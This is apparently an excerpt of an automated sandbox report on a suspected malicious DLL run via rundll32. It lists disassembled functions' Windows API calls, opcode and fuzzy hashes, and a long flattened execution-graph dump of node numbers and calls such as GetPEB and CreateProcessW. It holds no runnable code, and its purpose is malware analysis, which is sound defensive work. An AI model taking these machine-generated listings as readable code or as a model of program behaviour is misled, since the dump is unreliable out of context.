                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(00AC1550), ref: 1003A5C9
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,6D2214A9), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,6D2214A9), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,6D2214A9), ref: 1001DCDB
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction ID: 642a70e52bf11b7de8cb7bbdb6da5a8b8236a488639b363106a5e3ee5626d218
                                                                                                                      • Opcode Fuzzy Hash: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction Fuzzy Hash: B701B971A10118BFDF09DB74DD86AEE73B8DF04B01F0105E9EA02DB140EEB1EB448661
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:8.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1021
                                                                                                                      Total number of Limit Nodes:15
8354->8355 8355->8351 8357 735fb4 8356->8357 8358 73c1dc GetPEB 8357->8358 8359 735fda 8358->8359 8359->7986 8361 73972e 8360->8361 8362 751310 GetPEB 8361->8362 8363 739995 8362->8363 8370 74679c 8363->8370 8365 7399d1 8366 744dad 2 API calls 8365->8366 8369 7399dc 8365->8369 8367 7399fc 8366->8367 8368 744dad 2 API calls 8367->8368 8368->8369 8369->7983 8371 7467d5 8370->8371 8372 732d9f GetPEB 8371->8372 8373 746847 CreateProcessW 8372->8373 8373->8365 8375 73f4d9 8374->8375 8376 732d9f GetPEB 8375->8376 8377 73f533 8376->8377 8377->7992 8379 732d9f GetPEB 8378->8379 8380 74e3ee 8379->8380 8380->7992 8383 745636 8381->8383 8382 743512 2 API calls 8382->8383 8383->8382 8384 74596d 8383->8384 8386 74596b 8383->8386 8396 73b267 8383->8396 8385 73b267 GetPEB 8384->8385 8385->8386 8386->7992 8389 73bca3 8388->8389 8390 732d9f GetPEB 8389->8390 8391 73bd00 8390->8391 8391->7992 8393 740005 8392->8393 8394 732d9f GetPEB 8393->8394 8395 740094 8394->8395 8395->7994 8397 73b29a 8396->8397 8398 732d9f GetPEB 8397->8398 8399 73b31d 8398->8399 8399->8383 8408 742a6a 8400->8408 8401 742bb6 8401->8003 8403 743512 2 API calls 8403->8408 8404 742bb8 8405 7368de GetPEB 8404->8405 8405->8401 8406 73ab66 2 API calls 8406->8408 8407 73c1dc GetPEB 8407->8408 8408->8401 8408->8403 8408->8404 8408->8406 8408->8407 8409 73ae03 GetPEB 8408->8409 8466 74c9a9 8408->8466 8409->8408 8425 7470f5 8410->8425 8411 743512 RtlAllocateHeap GetPEB 8411->8425 8414 74744f 8417 73bb4b 2 API calls 8414->8417 8416 73ab66 2 API calls 8416->8425 8419 74746e 8417->8419 8418 747144 8420 7368de GetPEB 8418->8420 8483 73f060 8419->8483 8423 747163 8420->8423 8421 73c1dc GetPEB 8421->8425 8423->8003 8425->8411 8425->8414 8425->8416 8425->8418 8425->8421 8425->8423 8427 73ae03 GetPEB 8425->8427 8471 73bb4b 8425->8471 8475 73f545 8425->8475 8479 74fd29 8425->8479 8426 73ae03 GetPEB 8426->8423 8427->8425 8433 731fdb 8428->8433 8430 743512 2 API calls 8430->8433 8433->8430 8434 74fd29 GetPEB 8433->8434 8435 7368de 
GetPEB 8433->8435 8436 732823 8433->8436 8491 7445cd 8433->8491 8498 74fa99 8433->8498 8502 741831 8433->8502 8518 74ff31 8433->8518 8434->8433 8435->8433 8436->8003 8440 73bd31 8438->8440 8441 743512 2 API calls 8440->8441 8442 73bffa 8440->8442 8445 73c013 8440->8445 8446 74fd29 GetPEB 8440->8446 8549 74cc89 8440->8549 8556 7464f1 8440->8556 8441->8440 8444 7368de GetPEB 8442->8444 8444->8445 8445->8003 8446->8440 8465 747c38 8447->8465 8448 750411 GetPEB 8448->8465 8452 748b27 8453 750411 GetPEB 8452->8453 8455 748881 8453->8455 8455->8003 8456 74886b 8566 750411 8456->8566 8457 7368de GetPEB 8457->8465 8459 73ab66 2 API calls 8459->8465 8462 73ae03 GetPEB 8462->8465 8463 73b6d1 GetPEB 8463->8465 8465->8448 8465->8452 8465->8455 8465->8456 8465->8457 8465->8459 8465->8462 8465->8463 8570 7384b8 8465->8570 8573 750349 8465->8573 8577 7375a5 8465->8577 8581 7400a0 8465->8581 8585 750867 8465->8585 8594 7490db 8465->8594 8598 74bd01 8465->8598 8467 74c9c7 8466->8467 8468 743512 2 API calls 8467->8468 8469 74d2a8 GetPEB 8467->8469 8470 74cc7f 8467->8470 8468->8467 8469->8467 8470->8408 8472 73bb61 8471->8472 8473 743512 2 API calls 8472->8473 8474 73bc13 8473->8474 8474->8425 8476 73f567 8475->8476 8477 73c1dc GetPEB 8476->8477 8478 73f587 8477->8478 8478->8425 8480 74fd44 8479->8480 8487 73c14b 8480->8487 8484 73f07c 8483->8484 8485 73c1dc GetPEB 8484->8485 8486 73f098 8485->8486 8486->8426 8488 73c167 8487->8488 8489 732d9f GetPEB 8488->8489 8490 73c1cc 8489->8490 8490->8425 8492 7445ee 8491->8492 8493 743512 2 API calls 8492->8493 8494 744b24 8492->8494 8495 744b0a 8492->8495 8497 73ad30 GetPEB 8492->8497 8493->8492 8496 7368de GetPEB 8494->8496 8495->8433 8496->8495 8497->8492 8499 74faaf 8498->8499 8500 74fd29 GetPEB 8499->8500 8501 74fb24 8500->8501 8501->8433 8517 741867 8502->8517 8504 74274a 8504->8504 8506 742620 8510 737027 GetPEB 8506->8510 8508 7368de GetPEB 8508->8517 8509 743512 2 API calls 8509->8517 8513 742641 8510->8513 8513->8433 8514 73ab66 
RtlAllocateHeap GetPEB 8514->8517 8515 73ae03 GetPEB 8515->8517 8516 740eda GetPEB 8516->8517 8517->8504 8517->8506 8517->8508 8517->8509 8517->8514 8517->8515 8517->8516 8525 74fda3 8517->8525 8529 73e723 8517->8529 8533 73ba16 8517->8533 8537 743b45 8517->8537 8541 74fbcf 8517->8541 8521 74ff5b 8518->8521 8519 743512 2 API calls 8519->8521 8520 7501b7 8520->8433 8521->8519 8521->8520 8522 74f88f GetPEB 8521->8522 8523 75019f 8521->8523 8522->8521 8545 74f88f 8523->8545 8526 74fdc2 8525->8526 8527 732d9f GetPEB 8526->8527 8528 74fe4a 8527->8528 8528->8517 8530 73e739 8529->8530 8531 732d9f GetPEB 8530->8531 8532 73e7c2 8531->8532 8532->8517 8534 73ba38 8533->8534 8535 732d9f GetPEB 8534->8535 8536 73ba9c 8535->8536 8536->8517 8538 743b7a 8537->8538 8539 732d9f GetPEB 8538->8539 8540 743bff 8539->8540 8540->8517 8542 74fbf9 8541->8542 8543 732d9f GetPEB 8542->8543 8544 74fc7d 8543->8544 8544->8517 8546 74f8ab 8545->8546 8547 74fd29 GetPEB 8546->8547 8548 74f93a 8547->8548 8548->8520 8551 74cca8 8549->8551 8550 73b335 GetPEB 8550->8551 8551->8550 8552 74d19b 8551->8552 8553 743512 2 API calls 8551->8553 8555 74d187 8551->8555 8554 7368de GetPEB 8552->8554 8553->8551 8554->8555 8555->8440 8557 74650a 8556->8557 8558 74674a 8557->8558 8559 741831 2 API calls 8557->8559 8561 746748 8557->8561 8562 74d6c0 8558->8562 8559->8557 8561->8440 8563 74d6ef 8562->8563 8564 732d9f GetPEB 8563->8564 8565 74d753 8564->8565 8565->8561 8567 750427 8566->8567 8568 732d9f GetPEB 8567->8568 8569 7504d3 8568->8569 8569->8455 8602 73cf26 8570->8602 8574 750374 8573->8574 8575 732d9f GetPEB 8574->8575 8576 7503f7 8575->8576 8576->8465 8578 7375c4 8577->8578 8579 732d9f GetPEB 8578->8579 8580 737663 8579->8580 8580->8465 8582 7400d9 8581->8582 8583 732d9f GetPEB 8582->8583 8584 740170 8583->8584 8584->8465 8591 750b8b 8585->8591 8587 750cb5 8588 750cbd 8587->8588 8589 7368de GetPEB 8587->8589 8588->8465 8589->8588 8590 743512 RtlAllocateHeap GetPEB 8590->8591 8591->8587 8591->8590 8592 
74fd29 GetPEB 8591->8592 8593 7368de GetPEB 8591->8593 8606 73840b 8591->8606 8592->8591 8593->8591 8595 7490fd 8594->8595 8596 732d9f GetPEB 8595->8596 8597 749176 8596->8597 8597->8465 8599 74bd24 8598->8599 8600 732d9f GetPEB 8599->8600 8601 74bd9e 8600->8601 8601->8465 8603 73cf4c 8602->8603 8604 732d9f GetPEB 8603->8604 8605 7385a6 8604->8605 8605->8465 8607 73842d 8606->8607 8608 732d9f GetPEB 8607->8608 8609 7384a4 8608->8609 8609->8591 8611 732d9f GetPEB 8610->8611 8612 73b247 8611->8612 8613 7385b6 8612->8613 8614 7385cf 8613->8614 8615 732d9f GetPEB 8614->8615 8616 738641 8615->8616 8616->7877 8618 744fbe 8617->8618 8619 732d9f GetPEB 8618->8619 8620 745035 8619->8620 8620->8019 8632 73f58f 8621->8632 8625 7519b4 8624->8625 8655 743c1b 8625->8655 8630 744dad 2 API calls 8631 751b49 8630->8631 8631->8019 8637 73f5ba 8632->8637 8635 73f866 8636 744dad 2 API calls 8635->8636 8638 73c78b 8636->8638 8637->8635 8637->8638 8641 750cf5 8637->8641 8644 74e3f7 8637->8644 8648 750296 8637->8648 8652 733c3b 8637->8652 8638->8019 8642 75074a GetPEB 8641->8642 8643 750d40 8642->8643 8643->8637 8645 74e40d 8644->8645 8646 732d9f GetPEB 8645->8646 8647 74e48a 8646->8647 8647->8637 8649 7502af 8648->8649 8650 732d9f GetPEB 8649->8650 8651 75033b 8650->8651 8651->8637 8653 732d9f GetPEB 8652->8653 8654 733cc3 8653->8654 8654->8637 8656 732d9f GetPEB 8655->8656 8657 743caa 8656->8657 8657->8631 8658 741785 8657->8658 8659 7417a6 8658->8659 8660 732d9f GetPEB 8659->8660 8661 74181e 8660->8661 8661->8630 8668 736bb0 8662->8668 8663 736c1e 8663->8029 8664 7368de GetPEB 8664->8668 8665 735e0b GetPEB 8665->8668 8667 744dad 2 API calls 8667->8668 8668->8663 8668->8664 8668->8665 8668->8667 8762 73f88a 8668->8762 8674 745318 8669->8674 8670 745410 8671 73f88a GetPEB 8670->8671 8673 74540e 8671->8673 8673->8029 8674->8670 8674->8673 8770 744eff 8674->8770 8774 748d71 8674->8774 8782 74e713 8674->8782 8683 74aad1 8677->8683 8678 73ea7b 2 API calls 8678->8683 8679 74acc8 8679->8029 
8680 7512a8 GetPEB 8680->8683 8681 73ab66 RtlAllocateHeap GetPEB 8681->8683 8682 744fa8 GetPEB 8682->8683 8683->8678 8683->8679 8683->8680 8683->8681 8683->8682 8685 739700 3 API calls 8683->8685 8686 73e7ce GetPEB 8683->8686 8687 73ae03 GetPEB 8683->8687 8795 738650 8683->8795 8799 74c38f 8683->8799 8685->8683 8686->8683 8687->8683 8810 748fd2 8689->8810 8691 7368de GetPEB 8692 73537f 8691->8692 8692->8691 8693 73579e 8692->8693 8695 739700 3 API calls 8692->8695 8697 74ba68 GetPEB 8692->8697 8698 73579c 8692->8698 8700 7512a8 GetPEB 8692->8700 8701 73ae03 GetPEB 8692->8701 8702 73ea7b 2 API calls 8692->8702 8703 744fa8 GetPEB 8692->8703 8705 74c9a9 2 API calls 8692->8705 8706 738650 GetPEB 8692->8706 8707 73ab66 RtlAllocateHeap GetPEB 8692->8707 8708 73e7ce GetPEB 8692->8708 8709 74c38f 3 API calls 8692->8709 8813 735eb5 8692->8813 8817 73777b 8692->8817 8823 74d37b 8692->8823 8699 744dad 2 API calls 8693->8699 8695->8692 8697->8692 8698->8029 8699->8698 8700->8692 8701->8692 8702->8692 8703->8692 8705->8692 8706->8692 8707->8692 8708->8692 8709->8692 8723 7338b0 8710->8723 8711 733b5f 8713 739700 3 API calls 8711->8713 8712 733b32 8712->8029 8715 733b9c 8713->8715 8714 733b37 8716 744dad 2 API calls 8714->8716 8715->8712 8718 744dad 2 API calls 8715->8718 8716->8712 8717 73b186 GetPEB 8717->8723 8718->8714 8722 7512a8 GetPEB 8722->8723 8723->8711 8723->8712 8723->8714 8723->8717 8723->8722 8724 744dad CloseHandle GetPEB 8723->8724 8725 744fa8 GetPEB 8723->8725 8726 738650 GetPEB 8723->8726 8727 73ab66 2 API calls 8723->8727 8728 73e7ce GetPEB 8723->8728 8729 73ae03 GetPEB 8723->8729 8730 74c38f 3 API calls 8723->8730 8827 74363d 8723->8827 8837 739685 8723->8837 8840 73b41a 8723->8840 8724->8723 8725->8723 8726->8723 8727->8723 8728->8723 8729->8723 8730->8723 8737 738192 8731->8737 8732 73ea7b 2 API calls 8732->8737 8733 738397 8733->8029 8734 7512a8 GetPEB 8734->8737 8735 73ab66 RtlAllocateHeap GetPEB 8735->8737 8736 744fa8 GetPEB 8736->8737 8737->8732 
